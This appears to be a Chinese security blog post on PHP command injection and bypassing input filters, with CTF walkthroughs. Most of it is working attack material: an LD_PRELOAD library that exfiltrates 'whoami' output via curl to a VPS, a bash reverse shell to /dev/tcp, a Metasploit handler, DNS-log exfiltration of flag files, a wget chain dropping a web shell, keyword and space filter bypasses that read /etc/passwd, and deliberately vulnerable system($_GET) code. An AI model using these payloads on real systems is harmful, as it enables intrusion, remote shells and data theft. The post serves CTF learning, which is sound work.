<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">bool ob_start ([ callback $output_callback [, int $chunk_size [, bool $erase ]]] )</span><br><span class="line">此函数将打开输出缓冲。当输出缓冲激活后，脚本将不会输出内容（除http标头外），相反需要输出的内容被存储在内部缓冲区中。</span><br><span class="line"></span><br><span class="line">内部缓冲区的内容可以用 ob_get_contents() 函数复制到一个字符串变量中。 想要输出存储在内部缓冲区中的内容，可以使用 ob_end_flush() 函数。另外， 使用 ob_end_clean() 函数会静默丢弃掉缓冲区的内容。</span><br></pre></td></tr></table></figure>
<p> 使用</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    ob_start(<span class="string">"system"</span>);</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"whoami"</span>;</span><br><span class="line">    ob_end_flush();</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="comment">//输出www-data</span></span><br></pre></td></tr></table></figure>
<ul>
<li><strong>mail函数+LD_PRELOAD执行系统命令</strong></li>
</ul>
<p><strong>思路</strong></p>
<p>LD_PRELOAD可以用来设置程序运行前优先加载的动态链接库，php函数mail在实现的过程中会调用标准库函数，通过上传一个编译好的动态链接程序(这个程序中重新定义了一个mail函数会调用的库函数，并且重新定义的库函数中包含执行系统命令的代码。)，再通过LD_PRELOAD来设置优先加载我们的上传的动态链接程序，从而实现命令执行。</p>
<p><strong>利用</strong></p>
<p>a.c </p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt; </span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>&#123;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">payload</span><span class="params">()</span> </span>&#123;</span><br><span class="line">system(<span class="string">"curl http://vps_IP:4123/?a=`whoami`"</span>);</span><br><span class="line">&#125; </span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">geteuid</span><span class="params">()</span> </span>&#123;</span><br><span class="line"><span class="keyword">if</span> (getenv(<span class="string">"LD_PRELOAD"</span>) == <span class="literal">NULL</span>) &#123; <span class="keyword">return</span> <span class="number">0</span>; &#125;</span><br><span class="line">unsetenv(<span class="string">"LD_PRELOAD"</span>);</span><br><span class="line">payload();</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>编译</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">gcc -c -fPIC a.c -o a </span><br><span class="line"></span><br><span class="line">gcc -shared a -o a.so</span><br></pre></td></tr></table></figure>
<p>mail.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">putenv(<span class="string">"LD_PRELOAD=/var/www/html/a.so"</span>);</span><br><span class="line">mail(<span class="string">"a@localhost"</span>,<span class="string">""</span>,<span class="string">""</span>,<span class="string">""</span>,<span class="string">""</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>监听vps的4123端口，访问mail.php。</p>
<p><img src="https://www.fuzzer.xyz/images/os/1.png" alt="在这里插入图片描述"></p>
<h5 id="绕过姿势"><a href="#绕过姿势" class="headerlink" title="绕过姿势"></a>绕过姿势</h5><p><strong>空格</strong></p>
<p>在bash下，可以用以下字符代替空格</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;</span><br><span class="line">$&#123;IFS&#125;</span><br><span class="line">$IFS$<span class="number">9</span></span><br><span class="line">%<span class="number">09</span></span><br></pre></td></tr></table></figure>
<p>测试</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~<span class="comment"># cat&lt;test.txt</span></span><br><span class="line">hello world!</span><br><span class="line">root@kali:~<span class="comment"># cat$&#123;IFS&#125;test.txt</span></span><br><span class="line">hello world!</span><br><span class="line">root@kali:~<span class="comment"># cat$IFS$9test.txt</span></span><br><span class="line">hello world!</span><br><span class="line">root@kali:~<span class="comment">#</span></span><br></pre></td></tr></table></figure>
<p><img src="https://www.fuzzer.xyz/images/os/7.png" alt="在这里插入图片描述"></p>
<p>这里解释一下<code>${IFS},$IFS,$IFS$9</code>的区别，首先<code>$IFS</code>在linux下表示分隔符，然而我本地实验却会发生这种情况，这里解释一下,单纯的<code>cat$IFS2,bash</code>解释器会把整个<code>IFS2</code>当做变量名，所以导致输不出来结果，然而如果加一个<code>{}</code>就固定了变量名，同理在后面加个$可以起到截断的作用，但是为什么要用<code>$9</code>呢，因为<code>$9</code>只是当前系统shell进程的第九个参数的持有者，它始终为空字符串!</p>
<p>%09测试</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$cmd = $_GET[<span class="string">'cmd'</span>];</span><br><span class="line">system(<span class="string">"$cmd"</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//http://ip/index.php?cmd=cat%091.txt</span></span><br></pre></td></tr></table></figure>
<p><img src="https://www.fuzzer.xyz/images/os/13.png" alt="在这里插入图片描述"></p>
<p>命令终止符</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">%<span class="number">00</span></span><br><span class="line">%<span class="number">20</span><span class="comment">#</span></span><br></pre></td></tr></table></figure>
<p>命令分隔符<br>这里介绍5种姿势</p>
<p>%0a  符号</p>
<p>%0d  符号</p>
<p>;    符号<br>   在 shell 中，担任”连续指令”功能的符号就是”分号”</p>
<p><img src="https://www.fuzzer.xyz/images/os/14.png" alt="在这里插入图片描述"></p>
<p>&amp;  符号<br><img src="https://www.fuzzer.xyz/images/os/15.png" alt="在这里插入图片描述"></p>
<p>&amp; 放在启动参数后面表示设置此进程为后台进程，默认情况下，进程是前台进程，这时就把Shell给占据了，我们无法进行其他操作，对于那些没有交互的进程，很多时候，我们希望将其在后台启动，可以在启动参数的时候加一个’&amp;’实现这个目的。进程切换到后台的时候，我们把它称为job。切换到后台时会输出相关job信息，这里36210就是该进程的PID</p>
<p>|  符号<br><img src="https://www.fuzzer.xyz/images/os/16.png" alt="在这里插入图片描述"></p>
<p>管道符左边命令的输出就会作为管道符右边命令的输入，所以左边的输出并不显示</p>
<h6 id="敏感字符绕过"><a href="#敏感字符绕过" class="headerlink" title="敏感字符绕过"></a>敏感字符绕过</h6><p>这里假设过滤了<code>cat</code></p>
<ul>
<li>利用变量绕过 </li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~<span class="comment"># a=l;b=s;$a$b</span></span><br></pre></td></tr></table></figure>
<p><img src="https://www.fuzzer.xyz/images/os/8.png" alt="在这里插入图片描述"></p>
<ul>
<li>利用base编码绕过 </li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~<span class="comment"># echo 'cat' | base64</span></span><br><span class="line">Y2F0Cg==</span><br><span class="line">root@kali:~<span class="comment"># `echo 'Y2F0Cg==' | base64 -d` test.txt</span></span><br><span class="line">hello world!</span><br><span class="line">root@kali:~<span class="comment">#</span></span><br></pre></td></tr></table></figure>
<p><img src="https://www.fuzzer.xyz/images/os/9.png" alt="在这里插入图片描述"></p>
<ul>
<li><p>未定义的初始化变量</p>
<p>  cat$x /etc/passwd<br><img src="https://www.fuzzer.xyz/images/os/21.png" alt="在这里插入图片描述"></p>
</li>
<li><p>连接符</p>
<p>  cat /etc/pass’w’d<br>  <img src="https://www.fuzzer.xyz/images/os/22.png" alt="在这里插入图片描述"></p>
</li>
<li><p>七个字的命令执行</p>
</li>
</ul>
<p>这题是利用重命名文件绕过的，所以可以这样进行调用，因为限制了命令的长度，所以无法直接构造，只能通过文件构造</p>
<p>这里先介绍一下小技巧，linux下创建文件的命令可以用1&gt;1创建文件名为1的空文件</p>
<p><img src="https://www.fuzzer.xyz/images/os/10.png" alt="在这里插入图片描述"></p>
<p>进一步fuzz发现a&gt;1居然也可以，虽然会报错，但是还是可以创建空文件。</p>
<p><img src="https://www.fuzzer.xyz/images/os/11.png" alt="在这里插入图片描述"><br>ls&gt;1可以直接把把ls的内容导入一个文件中,但是会默认追加\n</p>
<p><img src="https://www.fuzzer.xyz/images/os/12.png" alt="在这里插入图片描述"></p>
<p>有了这个基础我们再来看这道题</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(strlen($_GET[<span class="number">1</span>])&lt;<span class="number">8</span>)&#123;</span><br><span class="line">     <span class="keyword">echo</span> shell_exec($_GET[<span class="number">1</span>]);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>简单的代码，可以利用</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span>&gt;wget\</span><br><span class="line"><span class="number">1</span>&gt;域名.\</span><br><span class="line"><span class="number">1</span>&gt;com\</span><br><span class="line"><span class="number">1</span>&gt;-O\</span><br><span class="line"><span class="number">1</span>&gt;she\</span><br><span class="line"><span class="number">1</span>&gt;ll.p\</span><br><span class="line"><span class="number">1</span>&gt;p</span><br><span class="line">ls&gt;a</span><br><span class="line">sh a</span><br></pre></td></tr></table></figure>
<p>这里注意.不能作为文件名的开头，因为linux下<code>.</code>是隐藏文件的开头，ls列不出来</p>
<p>然而这里还有个问题，就是ls下的文件名是按照字母顺序排序的，所以需要基于时间排序</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ls -t&gt;a</span><br></pre></td></tr></table></figure>
<ul>
<li>网络地址转化为数字地址</li>
</ul>
<p>网络地址有另外一种表示形式就是数字地址,比如127.0.0.1可以转化为2130706433可以直接访问<code>http://2130706433</code>或者<code>http://0x7F000001</code>这样就可以绕过.的ip过滤，这里给个转化网址<a href="http://www.msxindl.com/tools/ip/ip_num.asp" target="_blank" rel="noopener">http://www.msxindl.com/tools/ip/ip_num.asp</a></p>
<p> GCTF RCE</p>
<p>这题过滤了很多东西,下面说一下比较重要的</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">||&amp;|;|%&#123;&#125;| |<span class="string">''</span>|.|</span><br></pre></td></tr></table></figure>
<p>这里给个payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">%<span class="number">0</span>acat%<span class="number">09</span></span><br><span class="line">%<span class="number">0</span>Acat$IFS$<span class="number">9</span></span><br><span class="line">%<span class="number">0</span>acat</span><br></pre></td></tr></table></figure>
<p>用%0a绕过curl然后在从我前面绕过空格的payload中随便挑一个没有过滤的</p>
<ul>
<li><p>通配符绕过</p>
<p>Bash标准通配符（也称为通配符模式）被各种命令行程序用于处理多个文件。有关标准通配符的更多信息，并不是每个人都知道有很多bash语法是可以使用问号“？”，正斜杠“/”，数字和字母来执行系统命令的。你甚至可以使用相同数量的字符获取文件内容。</p>
<p>我们可以通过man 7 glob 查看通配符帮助或者直接访问linux官网查询<a href="http://man7.org/linux/man-pages/man7/glob.7.html" target="_blank" rel="noopener">文档</a></p>
</li>
</ul>
<p><img src="https://www.fuzzer.xyz/images/os/19.png" alt="在这里插入图片描述"></p>
<p>  这里我为大家举个栗子：</p>
<p>  例如ls命令我们可以通过以下语法代替执行：</p>
  <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/???/?s --help</span><br></pre></td></tr></table></figure>
<p><img src="https://www.fuzzer.xyz/images/os/20.png" alt="在这里插入图片描述"></p>
<p>  由于有师傅已经写的很好了，我也就不献丑了！请参考下列文章！</p>
<p>  <a href="https://www.freebuf.com/articles/web/186298.html" target="_blank" rel="noopener">参考文章</a></p>
<p>  <a href="https://www.freebuf.com/articles/web/160175.html" target="_blank" rel="noopener">​参考文章2</a></p>
<h6 id="处理无回显的命令执行"><a href="#处理无回显的命令执行" class="headerlink" title="处理无回显的命令执行"></a>处理无回显的命令执行</h6><p><strong>1.利用自己的vps</strong></p>
<p>第一种是利用bash命令并在本地进行nc监听结果查看回连日志，然后就行</p>
<p>先在vps处用nc进行监听</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -l -p <span class="number">8080</span> -vvv</span><br></pre></td></tr></table></figure>
<p>然后在靶机命令执行处输入</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">|bash -i &gt;&amp; /dev/tcp/xxxxxI(你的vps的公网ip)/<span class="number">8080</span> <span class="number">0</span>&gt;&amp;<span class="number">1</span></span><br></pre></td></tr></table></figure>
<p><img src="https://www.fuzzer.xyz/images/os/17.png" alt="在这里插入图片描述"></p>
<p><img src="https://www.fuzzer.xyz/images/os/18.png" alt="在这里插入图片描述"></p>
<p>第二种是msg反向回连</p>
<p>同样vps用msg监听</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">vps的msf监听：</span><br><span class="line"></span><br><span class="line"><span class="keyword">use</span> <span class="title">exploit</span>/<span class="title">multi</span>/<span class="title">handler</span></span><br><span class="line"><span class="title">set</span> <span class="title">payload</span> <span class="title">linux</span>/<span class="title">armle</span>/<span class="title">shell</span>/<span class="title">reverse_tcp</span></span><br><span class="line"><span class="title">set</span> <span class="title">lport</span> 8080</span><br><span class="line"><span class="title">set</span> <span class="title">lhost</span> <span class="title">xxx</span>.<span class="title">xxx</span>.<span class="title">xxx</span>.<span class="title">xxx</span></span><br><span class="line"><span class="title">set</span> <span class="title">exitonsession</span> <span class="title">false</span></span><br><span class="line"><span class="title">exploit</span> -<span class="title">j</span></span><br></pre></td></tr></table></figure>
<p>然后在靶机命令执行处输入</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">|bash -i &gt;&amp; /dev/tcp/xxxxxI(你的vps的公网ip)/<span class="number">8080</span> <span class="number">0</span>&gt;&amp;<span class="number">1</span></span><br></pre></td></tr></table></figure>
<p>即可getflag</p>
<p><strong>2.利用ceye平台</strong></p>
<p><a href="http://ceye.io/payloads" target="_blank" rel="noopener">平台的payload</a></p>
<p><strong>记录在http request中</strong></p>
<p>题目地址</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//192.168.10.55/</span></span><br></pre></td></tr></table></figure>
<p>后台源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a = $_GET[<span class="string">'id'</span>];</span><br><span class="line">system(<span class="string">"$a"</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl http:<span class="comment">//192.168.10.55.o40fok.ceye.io/?id=`whoami`</span></span><br></pre></td></tr></table></figure>
<p>只能使用linux的curl访问才会成功，在浏览器直接访问时无效的。<br> 效果 </p>
<p>图1</p>
<p><img src="https://www.fuzzer.xyz/images/os/t1.jpg" alt="在这里插入图片描述"></p>
<p><strong>记录在dns query中</strong></p>
<p><strong>简单介绍</strong></p>
<p>DNS在解析的时候是逐级解析的，并且会留下日志，所以可以将回显放在高级域名，这样在解析的时候就会将回显放在高级域名中，我们就可以在dns query中看到回显。<br> 举个例子</p>
<p>在注册ceye.io之后会分配一个三级域名。就是<strong><em>\</em></strong>.ceye.io。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ping `whoami`.******.ceye.io</span><br></pre></td></tr></table></figure>
<p>上面这条命令最终在ping的时候ping的是<code>“root.***\***.ceye.io”</code>，root就是我们构造的恶意命令执行的结果，我们把它放在四级域名这里，这样在DNS解析的时候就会记录下root这个四级域名。然后可以在ceye平台上看到我们的dns解析日志。也就看到了命令执行的回显。</p>
<p>所以这种方法的使用必须有ping命令。</p>
<p><strong>真题解析</strong></p>
<p>题目存在robots.txt文件，访问发现两个文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">index.txt</span><br><span class="line">where_is_flag.php</span><br></pre></td></tr></table></figure>
<p>index.php代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">include(&quot;where_is_flag.php&quot;);</span><br><span class="line">echo &quot;ping&quot;;</span><br><span class="line">$ip =(string)$_GET[&apos;ping&apos;];</span><br><span class="line">$ip =str_replace(&quot;&gt;&quot;,&quot;0.0&quot;,$ip);</span><br><span class="line">system(&quot;ping &quot;.$ip);</span><br></pre></td></tr></table></figure>
<p>可以看到存在ping命令，但是测试没有回显，于是就采用dnslog的方式来查看回显。<br> payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ping `cat where_is_flag.php|sed s/[[:space:]]/xx/g`.******.ceye.io</span><br><span class="line"><span class="comment"># 因为域名中不允许有空格，但是php代码中可能会含有空格，所以使用sed命令将php代码的空格替换为xx</span></span><br></pre></td></tr></table></figure>
<p> 最终的url</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//192.168.5.90/?ping=`cat where_is_flag.php|sed s/[[:space:]]/xx/g`.******.ceye.io</span></span><br></pre></td></tr></table></figure>
<p>在dns query中查看</p>
<p>图2</p>
<p><img src="https://www.fuzzer.xyz/images/os/t2.jpg" alt="在这里插入图片描述"></p>
<p>可以看到文件的内容是</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> $flag=<span class="string">"dgfsdunsadkjgdgdfhdfhfgdhsadf/flag.php"</span>;<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>由此得知flag.php的位置，继续打印flag.php的内容<br> 获取flag的url </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//192.168.5.90/?ping=`cat dgfsdunsadkjgdgdfhdfhfgdhsadf/flag.php|sed s/[[:space:]]/xx/g`.******.ceye.io</span></span><br></pre></td></tr></table></figure>
<p>图三</p>
<p><img src="https://www.fuzzer.xyz/images/os/t3.jpg" alt="在这里插入图片描述"><br> 得到flag。</p>
<h5 id="Think-one-Think"><a href="#Think-one-Think" class="headerlink" title="Think one Think"></a>Think one Think</h5><p>命令注入的利用其实跟sql注入流程相似，首先找到命令执行点，然后一步一步bypass，最好自己搭建环境实地测试，同时结合官方文档和资料，最终就会得到你需要的payload！</p>

    </article>
    <!-- license  -->
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href="/2019/03/13/php代码审计之函数漏洞审计(下)/" title="php代码审计之函数漏洞审计(下)">
                    <div class="nextTitle">php代码审计之函数漏洞审计(下)</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href="/2019/03/05/Phpstorm+Xdebug动态调试配置/" title="Phpstorm+Xdebug动态调试配置">
                    <div class="prevTitle">Phpstorm+Xdebug动态调试配置</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    
    <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
    <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
    <div id="comment"></div>
    <script>
    new Valine({
        el: '#comment' ,
        notify:false, 
        verify:false, 
        appId: "FuPdFy9xCtoivKmiix3FHb4d-gzGzoHsz",
        appKey: "pAQSVceyfizzVqhmmyUQeX2j",
        placeholder: "一起唠嗑:)",
        path:window.location.pathname, 
        avatar:'mm' 
    });
    </script>


    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:7989933065@qq.com" class="iconfont-archer email" title="email"></a>
            
        
    
        
            
                <a href="//github.com/Ethancck" class="iconfont-archer github" target="_blank" title="github"></a>
            
        
    
        
            
                <span class="iconfont-archer wechat" title="wechat">
                  
                  <img class="profile-qr" src="/assets/weixin.png">
                </span>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
            
                <a href="//twitter.com/Ethan18977083" class="iconfont-archer twitter" target="_blank" title="twitter"></a>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-5"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#正文"><span class="toc-number">2.</span> <span class="toc-text">正文</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#代码执行"><span class="toc-number">3.</span> <span class="toc-text">代码执行</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#代码执行的几种方式"><span class="toc-number">3.1.</span> <span class="toc-text">代码执行的几种方式</span></a></li></ol></li><li class="toc-item toc-level-5"><a class="toc-link" href="#命令执行"><span class="toc-number">4.</span> <span class="toc-text">命令执行</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#常见命令执行函数"><span class="toc-number">4.1.</span> <span class="toc-text">常见命令执行函数</span></a></li></ol></li><li class="toc-item toc-level-5"><a class="toc-link" href="#绕过姿势"><span class="toc-number">5.</span> <span class="toc-text">绕过姿势</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#敏感字符绕过"><span class="toc-number">5.1.</span> <span class="toc-text">敏感字符绕过</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#处理无回显的命令执行"><span class="toc-number">5.2.</span> <span class="toc-text">处理无回显的命令执行</span></a></li></ol></li><li class="toc-item toc-level-5"><a class="toc-link" href="#Think-one-Think"><span class="toc-number">6.</span> <span class="toc-text">Think one Think</span></a></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 28
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2019 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/09</span><a class="archive-post-title" href="/2019/06/09/Some fun tips/">Some fun tips</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/30</span><a class="archive-post-title" href="/2019/05/30/强网杯web部分writeup/">强网杯web部分writeup</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/27</span><a class="archive-post-title" href="/2019/05/27/charles破解/">charles破解</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/27</span><a class="archive-post-title" href="/2019/05/27/内存取证初探/">内存取证艺术</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/27</span><a class="archive-post-title" href="/2019/05/27/Xposed 插件开发基础/">Xposed插件开发</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/27</span><a class="archive-post-title" href="/2019/05/27/iscc线下攻防复现/">iscc2018攻防</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/13</span><a class="archive-post-title" href="/2019/05/13/RFI绕过URL包含限制getshell/">RFI绕过URL包含限制getshell</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/29</span><a class="archive-post-title" href="/2019/04/29/phar反序列化拓展攻击浅析/">phar反序列化拓展攻击浅析</a>
        </li>
    
    
        <li class="archive-post-item">
